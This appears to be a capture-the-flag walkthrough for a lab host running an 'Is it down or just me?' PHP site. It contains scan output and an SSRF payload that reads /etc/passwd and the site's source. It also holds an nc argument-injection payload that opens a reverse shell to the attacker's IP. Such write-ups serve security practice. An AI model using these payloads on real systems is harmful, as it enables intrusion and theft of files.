# Victim IP
```
10.129.39.124
```
# Attacker IP
```
10.10.14.191
```
# Nmap
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f6:cc:21:7c:ca:da:ed:34:fd:04:ef:e6:f9:4c:dd:f8 (ECDSA)
|_ 256 fa:06:1f:f4:bf:8c:e3:b0:c8:40:21:0d:57:06:dd:11 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Is it down or just me?
|_http-server-header: Apache/2.4.52 (Ubuntu)
3190/tcp filtered csvr-proxy
3329/tcp filtered hp-device-disc
4285/tcp filtered vrml-multi-use
4680/tcp filtered mgemanagement
4967/tcp filtered unknown
6336/tcp filtered unknown
7753/tcp filtered unknown
8999/tcp filtered bctp
10362/tcp filtered unknown
11051/tcp filtered unknown
11600/tcp filtered tempest-port
11903/tcp filtered unknown
12708/tcp filtered unknown
13199/tcp filtered unknown
15078/tcp filtered unknown
16140/tcp filtered unknown
17153/tcp filtered unknown
17609/tcp filtered unknown
25119/tcp filtered unknown
34475/tcp filtered unknown
35375/tcp filtered unknown
39696/tcp filtered unknown
40259/tcp filtered unknown
41464/tcp filtered unknown
44320/tcp filtered unknown
46811/tcp filtered unknown
49334/tcp filtered unknown
51690/tcp filtered unknown
54014/tcp filtered unknown
54250/tcp filtered unknown
59865/tcp filtered unknown
61349/tcp filtered unknown
62024/tcp filtered unknown
63662/tcp filtered unknown
65417/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 590.06 seconds
Raw packets sent: 72586 (3.194MB) | Rcvd: 70925 (2.889MB)
```
does not have internet connection but can use http / https addresses
have SSRF attack running in burpsuite
tried other forms such as file:// but got an error
about to run gobuster for directery / file enum
# Gobuster
```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.39.124
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 319] [--> http://10.129.39.124/javascript/]
/index.php (Status: 200) [Size: 739]
/server-status (Status: 403) [Size: 278]
Progress: 47937 / 60000 (79.89%)[ERROR] parse "http://10.129.39.124/error\x1f_log": net/url: invalid control character in URL
[ERROR] parse "http://10.129.39.124/error\x1f_log.php": net/url: invalid control character in URL
Progress: 59998 / 60000 (100.00%)
===============================================================
Finished
===============================================================
```
nothing of interest
by requesting
```
http://+file%3a///etc/passwd
```
as the url parameter in the post request we can get the output of /etc/passwd
where we discover the user `aleks` login shell is `/bin/bash`
Was able to disclose index.php by requesting `http:// file:///var/www/html/index.php` url encoded ofc and got this source code back after html decoding it
```php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Is it down or just me?</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<header>
<img src="/logo.png" alt="Logo">
<h2>Is it down or just me?</h2>
</header>
<div class="container">
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
echo '<h1>Is the port refused, or is it just you?</h1>
<form id="urlForm" action="index.php?expertmode=tcp" method="POST">
<input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
<input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
<button type="submit">Is it refused?</button>
</form>';
} else {
echo '<h1>Is that website down, or is it just you?</h1>
<form id="urlForm" action="index.php" method="POST">
<input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
<button type="submit">Is it down?</button>
</form>';
}
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
$ip = trim($_POST['ip']);
$valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
$port = trim($_POST['port']);
$port_int = intval($port);
$valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
if ( $valid_ip && $valid_port ) {
$rc = 255; $output = '';
$ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");
exec($ec . " 2>&1",$output,$rc);
echo '<div class="output" id="outputSection">';
if ( $rc === 0 ) {
echo "<font size=+1>It is up. It's just you! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
} else {
echo "<font size=+1>It is down for everyone! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
}
} else {
echo '<div class="output" id="outputSection">';
echo '<font color=red size=+1>Please specify a correct IP and a port between 1 and 65535.</font>';
}
} elseif (isset($_POST['url'])) {
$url = trim($_POST['url']);
if ( preg_match('|^https?://|',$url) ) {
$rc = 255; $output = '';
$ec = escapeshellcmd("/usr/bin/curl -s $url");
exec($ec . " 2>&1",$output,$rc);
echo '<div class="output" id="outputSection">';
if ( $rc === 0 ) {
echo "<font size=+1>It is up. It's just you! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
} else {
echo "<font size=+1>It is down for everyone! ð</font><br><br>";
}
} else {
echo '<div class="output" id="outputSection">';
echo '<font color=red size=+1>Only protocols http or https allowed.</font>';
}
}
?>
</div>
</div>
<footer>© 2024 isitdownorjustme LLC</footer>
</body>
</html>
```
```php
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
echo '<h1>Is the port refused, or is it just you?</h1>
<form id="urlForm" action="index.php?expertmode=tcp" method="POST">
<input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
<input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
<button type="submit">Is it refused?</button>
</form>';
} else {
echo '<h1>Is that website down, or is it just you?</h1>
<form id="urlForm" action="index.php" method="POST">
<input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
<button type="submit">Is it down?</button>
</form>';
}
```
stands out as it's looking for a get parameter of expertmode with the value of tcp to show a new form
bypassed filter on expertmode to get reverse shell
```
ip=10.10.14.191&port=1337 -e /bin/bash
```